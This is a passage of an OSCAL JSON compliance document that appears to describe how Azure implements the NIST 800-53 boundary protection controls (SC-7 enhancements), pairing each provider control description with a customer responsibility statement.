Service teams additionally configure their host firewalls to further limit connectivity, specifying for each listening port whether connections are accepted from external networks or only from role instances within the same cloud service or VNet."}],"responsibilities":[{"uuid":"184ac142-f856-41f8-99a5-cf730ecebae4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-015"}],"description":"The customer is responsible for implementing a managed interface for each external telecommunication service.","provided-uuid":"cf751a80-1e52-41c8-9489-f884a9ad1917"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8ab7079f-011b-4f68-86b8-328ba7000d2f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.b","by-components":[{"uuid":"0c661f21-c7f4-4970-9242-2bfa13aff1e8","export":{"provided":[{"uuid":"2ca5ddac-5900-47a9-8df7-f7be5256a3ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-016"}],"description":"The Azure Networking team establishes routing policies and ACLs at the edge to only allow the export of 8075 public blocks to Azure's Border Gateway Protocol (BGP) peers. Edge Access Control Lists (ACLs) are applied inbound from all peering interfaces. The policy explicitly filters non-edge protocols such as SQL, RPC, 445, and 135-139 from entering the network from untrusted sources. Service teams running on top of the fabric customize the routing policies and ACLs necessary for their service. 
For instance, the Azure Portal needs to be externally accessible, but the JIT Portal does not."}],"responsibilities":[{"uuid":"96438c5b-d973-46f1-9afa-033f98734d40","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-016"}],"description":"The customer is responsible for establishing a traffic flow policy for each managed interface.","provided-uuid":"2ca5ddac-5900-47a9-8df7-f7be5256a3ec"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d2e57006-b7f3-4fcf-b906-1c9145c4f058","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.c","by-components":[{"uuid":"c64d100b-6046-469a-b776-e1a876eb3233","export":{"provided":[{"uuid":"bba01d1e-c703-4f39-b5d2-43b6cd03375e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-017"}],"description":"Azure requires the use of TLS 1.2/1.3 throughout the cloud. 
A TLS scanner hosted by Unified Remoting Scanning (URSA) is used to determine the status of Azure encryption in transit, specifically the use of TLS 1.2/1.3 or higher."}],"responsibilities":[{"uuid":"b2b5628d-d44f-4674-8a16-b2fe992f23ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-017"}],"description":"The customer is responsible for protecting the confidentiality and integrity of the information being transmitted across each interface.","provided-uuid":"bba01d1e-c703-4f39-b5d2-43b6cd03375e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9a9524b6-1378-4ae9-bc7d-6a9f283768b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.d","by-components":[{"uuid":"0f690c1f-12e5-4ed8-97f1-c1f055393639","export":{"provided":[{"uuid":"5ae46055-081b-4210-aac4-029020122954","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-018"}],"description":"Azure documents exceptions to the traffic flow policy outside the standard, approved baseline via the security review process with a supporting mission/business need and duration of that need. 
In the event an exception is needed from the traffic flow policy, a security review is documented and reviewed by the C+AI Security team."}],"responsibilities":[{"uuid":"e3253121-fd3b-4dc5-8804-70c2cf0df6c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-018"}],"description":"The customer is responsible for documenting each exception to the traffic flow policy with a supporting mission/business need and duration of that need.","provided-uuid":"5ae46055-081b-4210-aac4-029020122954"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c6543138-2f6d-4e11-8c5f-963f2165046e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.e","by-components":[{"uuid":"e52d264f-306b-4292-b3a9-f4913176f79f","export":{"provided":[{"uuid":"a8bfa6fe-ef74-466f-90e2-90505c8b1fea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-019"}],"description":"Azure reviews each change to the network ACL via the C+AI Security Policy Exception process with a supporting mission/business need and duration of that need. In the event an exception is needed, a security review (SR) is documented and reviewed by the C+AI Security team. All exceptions are reviewed on at least a semiannual basis. The Azure Networking team removes all exceptions that are no longer supported by a business need in Azure. If the Azure Networking team identifies and reviews a policy exception that is no longer needed, they remove that exception. 
At the infrastructure level, Azure blocks administrative ports on the internet edge of the environment through the Edge ACL baseline. To detect any authorized changes to the established traffic flow policies on the Azure boundary the Azure Security Monitoring (ASM) team automatically scans the internet boundary of the Azure environment every four (4) hours. If a blocked port is opened, a ticket is automatically created in the ticketing system and an alert is created for the Azure Security Response Team to remediate."}],"responsibilities":[{"uuid":"1d6ffc63-69cc-4545-ba5e-242bc2f534a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-019"}],"description":"The customer is responsible for reviewing exceptions to the traffic flow policy at an organization-defined frequency and removing exceptions that are no longer supported by an explicit mission/business need.","provided-uuid":"a8bfa6fe-ef74-466f-90e2-90505c8b1fea"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f467ad6e-0229-494a-9eb7-547b7a3e1a8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.f","by-components":[{"uuid":"4c55c1b8-7d41-4933-8232-eb6f608e008e","export":{"provided":[{"uuid":"14a37456-2954-46fe-b701-b91d7641ba8d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-020"}],"description":"As described in the Microsoft Security Program Policy (MSPP) and associated standards, Azure employs a deny-all, permit-by-exception policy for allowing the Azure information system to 
connect to external information systems. Currently, Azure does not have any connections to external information systems. The only interconnections are with internal Microsoft services. The internal Microsoft services that connect with Azure cloud are CorpNet and Cosmos. CorpNet is the Microsoft corporate network. CorpNet contains services run on Microsoft's corporate network, not dedicated to Azure, such as source code repositories, system document repositories, and change ticketing. Cosmos is a service, not dedicated to Azure, that stores and reports on Azure log data. AAD scrubs logs of customer information before sending logs to Cosmos. Azure does not require ISAs/MOUs for connections internal to Microsoft."}],"responsibilities":[{"uuid":"efb2193e-9e0f-4727-9f14-044282489f68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-020"}],"description":"The customer is responsible for preventing unauthorized exchange of control plane traffic with external networks.","provided-uuid":"14a37456-2954-46fe-b701-b91d7641ba8d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bda9874b-5ab1-4c5b-8b78-3b8e274e8aef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.g","by-components":[{"uuid":"8a112d1e-20c2-4a6e-ad48-ca1f327c21ed","export":{"provided":[{"uuid":"d0e51606-e8d8-48cd-9c21-bf0e9dcb9044","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-021"}],"description":"The overarching principle for a virtualized solution is to allow only 
connections and communications that are necessary for that virtualized solution to operate, blocking all other ports, protocols, and connections by default. Azure only allows connections and communication that are necessary to operate the system and only after being explicitly opened. Connections are managed at the system boundary using Azure Networking boundary protection devices. Connections within the boundary are managed using: * IP Filtering * Network Security Group (NSG) ACLs * VFP Filtering (for virtual machines) * Host-based firewalls * Guest firewalls (for virtual machines)"}],"responsibilities":[{"uuid":"e015ba26-60b0-4fea-88ff-b791cf76f466","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-021"}],"description":"The customer is responsible for publishing information to enable remote networks to detect unauthorized control plane traffic from internal networks.","provided-uuid":"d0e51606-e8d8-48cd-9c21-bf0e9dcb9044"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a9677360-34e8-478c-a60e-65e0b63e3929","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.h","by-components":[{"uuid":"9e9561b8-3014-4435-b404-9ed63a146dd6","export":{"provided":[{"uuid":"09d9ce58-6046-42b4-84ec-f07a04bdd972","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-022"}],"description":"Azure controls and monitors all inbound and outbound traffic through a limited number of network access points at the boundary and at key points within Azure. 
Azure leverages the following security mechanisms to limit the number of external network connections: * Load balancing and limiting inbound access to Azure, Azure Management Portal, front-end, and customer VM RDP. Each datacenter contains two groups of Jumpboxes, Debug Servers, and Hop Boxes behind a load balancer to limit the access points for Azure internal traffic, and customer traffic passes through a load balancer as well. Both entry points are monitored and generate audit logs and alerts in near-real time. * Jumpboxes, Debug servers, and Network Hop Boxes control all access to Azure. * Azure services are only accessible to customer users through the Azure provisioning portal and Web Services (REST API) interfaces."}],"responsibilities":[{"uuid":"244aaed7-e32a-4d2e-bc70-b2381bd55953","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-022"}],"description":"The customer is responsible for filtering unauthorized control plane traffic from external networks.","provided-uuid":"09d9ce58-6046-42b4-84ec-f07a04bdd972"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"afaa68bc-fcb0-48be-818b-6a499a253f17","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.5","statements":[{"uuid":"c2995b6a-2567-47a1-b284-ea2c13e845e1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.5_smt","by-components":[{"uuid":"c4273d51-11e7-4b1b-afc7-d7a56dba67a2","export":{"provided":[{"uuid":"6ec790ce-028d-4558-aafb-edf882d0abe9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-023"}],"description":"The overarching principle for a virtualized solution is to allow only connections and communications that are necessary for that virtualized solution to operate, blocking all other ports, protocols, and connections by default. Azure only allows connections and communication that are necessary to operate the system and only after being explicitly opened. Connections are managed at the system boundary using Azure Networking boundary protection devices. 
Connections within the boundary are managed using: * IP Filtering * Network Security Group (NSG) ACLs * VFP Filtering (for virtual machines) * Host-based firewalls * Guest firewalls (for virtual machines)"}],"responsibilities":[{"uuid":"355a3050-b9ec-4e0f-a4db-47bb811d38f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-023"}],"description":"The customer is responsible for configuring managed network interfaces to deny all traffic by default and permit by exception.","provided-uuid":"6ec790ce-028d-4558-aafb-edf882d0abe9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"114b2419-5b56-46be-ae6b-2cd33096842f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.7","statements":[{"uuid":"02bc5ffd-368a-49a4-b7a4-4b02ee6224a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.7_smt","by-components":[{"uuid":"0ad4ceff-1126-461c-a5d4-083efdb2acfe","export":{"provided":[{"uuid":"6537359b-5ffc-4e53-9472-5c24da22031e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-024"}],"description":"Azure sessions do not permit split tunneling. Azure utilizes an L4 VPN which does not allow split tunneling - this feature only works with L3 VPNs. 
All connections are made over FIPS 140-2 TLS encrypted connections and authenticated using multifactor authentication (MFA). Azure does not permit remote devices to establish non-remote connections (such as VPNs) with the Azure environment. In order to access the Azure environment, a user must authenticate with their Azure domain credentials either through an Azure Remote Desktop Gateway boundary device via the Microsoft remote desktop connection client (internet accessible) or through a connection (not internet accessible)."}],"responsibilities":[{"uuid":"58eb13d8-6a25-4690-b8dc-453ae52439af","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-024"}],"description":"The customer is responsible for preventing split tunneling for remote devices connecting to the customer-deployed system.","provided-uuid":"6537359b-5ffc-4e53-9472-5c24da22031e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"9e03a92c-dd35-4796-b5f7-76609d9c4c7d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.8","statements":[{"uuid":"17f58241-a01a-446f-8887-f22488db1129","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-025"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-7.8_smt","by-components":[{"uuid":"7877e378-a5b7-4e6a-a29d-2b961d7e3180","export":{"provided":[{"uuid":"8da74d73-c448-4b26-83d4-4b0c29dd0bde","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-025"}],"description":"This control does not apply to Azure. 
Proxy servers are not deployed in Azure since Azure does not externally route internal traffic. This control is related to controlling and monitoring client-initiated internet communications (e.g. outbound HTTP proxies). Clients/desktops are not in the scope of Azure and are managed by the customer. These connections to Azure assets are managed by Azure and are controlled by the Azure Networking team."}],"responsibilities":[{"uuid":"3a3a3133-f85b-4f0b-b0d8-4e96db529ca4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-025"}],"description":"The customer is responsible for routing customer-defined information through an authenticated proxy to an external network.","provided-uuid":"8da74d73-c448-4b26-83d4-4b0c29dd0bde"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f0feab84-ccde-435b-aca4-e171d5fa0842","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.10","statements":[{"uuid":"e2cf41fa-5124-4685-b189-1adcffec3211","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.10_smt.a","by-components":[{"uuid":"0782ea9d-3b03-4537-a435-6bd4896309e6","export":{"provided":[{"uuid":"e00e4be4-b3e7-4ebc-a003-170e0904aab4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-026"}],"description":"For Azure services, onboarding to Azure Security Pack (AzSecPack) enables monitoring of network 
communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally via Microsoft Defender for Cloud via Fileless Attack detections, and via the Network Risk Management (NRM) Service. The NRM service assesses the resultant set of open ports and protocols based on data provided by the VM agent. Additionally, for VMs hosted on Azure, the Network Security Group (NSG) settings are considered and the resultant set of the settings is calculated. Additionally, for the assets running in Bare Metal, Azure assesses the Surface Area Manager configuration settings. For Linux VMs hosted in Azure, Azure uses the NSG settings to validate that the configuration meets the network baseline requirements. For all deployment types, if there is a network baseline violation that exposes a management port to the internet, an alert is generated and provided to the service team. For internal services, there is monitoring and alerting for unusual behavior of key security features including, but not limited to, if a user accesses an asset without using Azure Just In Time (JIT) access, if a dSTS account has an unusual access pattern, if the Geneva Actions have unusual activity, if the Azure Fabric is accessed without using Azure JIT, or if a service owner has unexpected changes to permissions in the service team subscription. Additionally, service teams regardless of deployment type must monitor their own network connections for unexpected network activities at the application layer. However, to protect customer end user identifiable information, Azure does not monitor the customer traffic in the security monitoring solutions. Azure does not inspect or monitor customer traffic. By default, Microsoft is unaware of what data is outbound from the environment by the customer. 
In the event of customer data spillage, upon customer request, Microsoft may assist with the incident including accessing customer data according to the Azure Incident Management Standard Operating Procedure (SOP)."}],"responsibilities":[{"uuid":"8ea2241b-34a3-45b8-be73-323570882584","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-026"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for preventing unauthorized exfiltration of information across managed interfaces.","provided-uuid":"e00e4be4-b3e7-4ebc-a003-170e0904aab4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1e80698c-19bf-47a7-a3e2-5a8137cf0068","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.10_smt.b","by-components":[{"uuid":"96a3d072-d07f-442a-b8f9-cc5f64b0dcb4","export":{"provided":[{"uuid":"e7bb0190-f2b4-4d0f-b1f1-0d72a277f7eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-027"}],"description":"The Third Party Assessment Organization (3PAO) performs penetration testing on the information system at least annually which includes exfiltration testing. 
The Penetration Test Report covers Azure system components identified as part of the authorization boundary."}],"responsibilities":[{"uuid":"48977d6d-27c6-45ee-ab84-38f6607b04f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-027"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for conducting exfiltration tests at organization-defined frequency.","provided-uuid":"e7bb0190-f2b4-4d0f-b1f1-0d72a277f7eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"44cbfebc-1b67-4f9e-ae73-a7b776e4c40b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.12","statements":[{"uuid":"28c45eb9-34bb-44af-b12f-ffe31c3d729b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.12_smt","by-components":[{"uuid":"459cea23-9e5c-4d6e-b675-8cbf51046a61","export":{"provided":[{"uuid":"d0814f7f-3fdf-4e65-9909-c4b44bc010b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-028"}],"description":"Azure implements the following host-based boundary protection mechanisms:_x000D_ _x000D_ * IP Filtering_x000D_ * VFP Filtering (for virtual machines)_x000D_ * Host-based firewalls_x000D_ * Guest firewalls (for virtual machines)_x000D_ _x000D_ Azure uses a combination of detection and fast response via several methods to address the risk of intrusion. 
This includes the use of event forwarding tools, security incident and event management tools, vulnerability scanning and reporting tools, and centrally managed anti-virus on Azure assets. These tools are forms of host-based protection._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7981da30-8e6d-4c98-bab7-45115c03038c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-028"}],"description":"The customer is responsible for implementing host-based boundary protection at customer-deployed virtual machines running customer-controlled operating systems.","provided-uuid":"d0814f7f-3fdf-4e65-9909-c4b44bc010b8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f304623b-f432-4bfd-af0f-7461579d96e0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.18","statements":[{"uuid":"c34c2776-d991-4515-aba9-ba9bdd4526e1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.18_smt","by-components":[{"uuid":"cd346ec7-1d38-472f-9144-05c0186692af","export":{"provided":[{"uuid":"e0faa359-5c46-493a-a872-ca7f67017e56","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-029"}],"description":"Azure deploys geographically separate and redundant boundary protection network devices and Jumpboxes and SSL VPN servers. When an asset fails, it fails securely, and access is restricted to the environment. 
If Azure network devices, including but not limited to edge routers, access routers, load balancers, aggregation switches, and TORs (top-of-rack switches) fail, the affected circuit becomes disconnected, thereby failing securely. A failure of an Azure network device cannot lead to, or cause, information external to the system entering the device, nor can a failure permit unauthorized information release. The built-in redundancy allows Azure assets to fail without influencing availability. Many Azure network devices are configured to reboot in the event of failure, rather than remaining offline._x000D_ _x000D_"}],"responsibilities":[{"uuid":"621ff98a-847c-4092-a82b-55ae273e3217","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-029"}],"description":"The customer is responsible for preventing systems from entering unsecure states in the event of an operational failure of a boundary protection device.","provided-uuid":"e0faa359-5c46-493a-a872-ca7f67017e56"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5ed7b38e-02e5-490e-b705-9f17725c35b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.20","statements":[{"uuid":"902bfdb1-c32f-48ac-baab-702a2ffda77b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.20_smt","by-components":[{"uuid":"b9d1d97e-0c71-4519-b8ca-90104d0a26fc","export":{"provided":[{"uuid":"e50ff03c-80b4-4a7d-a476-b0393fb64425","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-030"}],"description":"Azure personnel have the capability to isolate or segregate Azure assets by various means, including but not limited to:_x000D_ _x000D_ * Physical network disconnection_x000D_ * Removal from load balancer rotation_x000D_ * VLAN, NSG, and ACL isolation_x000D_ _x000D_ Any of these actions can be performed in real time by the appropriate service team or Security Response Team as required._x000D_ _x000D_"}],"responsibilities":[{"uuid":"55732e8b-5541-48d2-b554-c281a9a1f9ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-030"}],"description":"The customer is responsible for ensuring that the system has the capability to dynamically isolate customer-deployed resources.","provided-uuid":"e50ff03c-80b4-4a7d-a476-b0393fb64425"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fee2e2fe-90b6-403b-b8a7-0e1dae84f9cd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.21","statements":[{"uuid":"a0927b8b-68bc-4945-80d4-075563492c50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.21_smt","by-components":[{"uuid":"2e4df7cd-8f32-414f-8b71-22f8ae6d191c","export":{"provided":[{"uuid":"26c0d304-e3f7-4778-9e2c-c3594394fdc8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-031"}],"description":"Azure service teams are segregated from each other using Azure-managed boundary protection devices for bare metal hardware or logical isolation mechanisms for virtual machines, including VLAN and Network Security Group (NSG) and Virtual Network (VNet) segmentation, ACL restrictions, and encrypted communications. Azure also implements logical separation for its separate cloud environments in addition to all boundary protection mechanisms described above. 
